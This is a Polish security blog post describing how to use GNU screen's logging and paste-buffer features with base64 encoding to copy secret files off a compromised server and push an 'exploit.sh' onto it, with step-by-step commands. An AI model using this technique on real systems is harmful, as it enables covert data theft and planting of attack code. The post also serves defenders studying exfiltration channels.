NFsec Logo

Wyprowadzamy dane z serwera za pomocą „ekranu”

30/10/2020 (4 tygodnie temu) w Ataki Internetowe, Bezpieczeństwo Brak komentarzy.  (artykuł nr 753, ilość słów: 332)

D

ane z serwerów możemy wyprowadzać za pomocą różnego rodzaju tuneli ukrytych w protokołach. Możemy też wykorzystać do tego celu menedżer okien terminala – screen, który będzie tylko i wyłącznie zainstalowany na naszym lokalnym komputerze. Dla przykładu prześlemy plik o wielkości 1092 KB z zdalnego serwera na nasz lokalny komputer:

  • Uruchamiamy polecenie screen na lokalnym komputerze i łączymy się z zdalnym serwerem, do którego uzyskaliśmy dostęp,
  • Naciskamy sekwencję klawiszy: Ctrl+a : – po pojawieniu się znaku zachęty : w lewym, dolnym rogu wpisujemy: logfile dataout.txt i naciskamy Enter,
  • Kolejną sekwencją definiującą początek zapisu strumienia danych do pliku dataout.txt jest: Ctrl+a H,
  • Dane prześlemy zakodowane base64 wydając polecenie: openssl base64 < tajne_dane.txt,
  • Kończymy strumień danych i wyzwalamy zapis pliku tą samą sekwencją, co rozpoczęcie: Ctrl+a H.

W drugiej konsoli teraz już na lokalnym komputerze możemy oczyścić plik wycinając pierwszą (polecenie) i ostatnią (znak zachęty powłoki) linię przy okazji dekodując plik:

cat dataout.txt | tail -n +2 | head -n -1 | openssl base64 -d


Skoro możemy wyprowadzić dane z serwera to również istnieje sposób na ich wprowadzenie:

  • Na lokalnym komputerze przygotowujemy plik do transferu: openssl base64 < exploit.sh > datain.txt,
  • Uruchamiamy polecenie screen oraz łączymy się z zdalnym serwerem, do którego uzyskaliśmy dostęp,
  • Wpisujemy na zdalnym serwerze polecenie: openssl base64 -d > exploit.sh, następnie naciskamy sekwencję klawiszy: Ctrl+a : – po pojawieniu się znaku zachęty : w lewym, dolnym rogu wpisujemy: readbuf datain.txt i naciskamy Enter,
  • Po pojawieniu się komunikatu Slurped XXX characters into buffer, ponownie wprowadzamy sekwencję klawiszy: Ctrl+a : – po pojawieniu się znaku zachęty : w lewym, dolnym rogu wpisujemy: paste .,
  • Po zakończeniu pojawiania się zawartości zakodowanego pliku na ekranie kończymy strumień danych i wyzwalamy zapis pliku poprzez podwójne naciśnięcie sekwencji: Ctrl+d.

Dane w odkodowanej formie powinny być zapisane w pliku exploit.sh.

Więcej informacji: Copy and Paste in Screen, man screen

Kategorie K a t e g o r i e : Ataki Internetowe, Bezpieczeństwo

Tagi T a g i : , , , , , ,

Komentowanie tego wpisu jest zablokowane.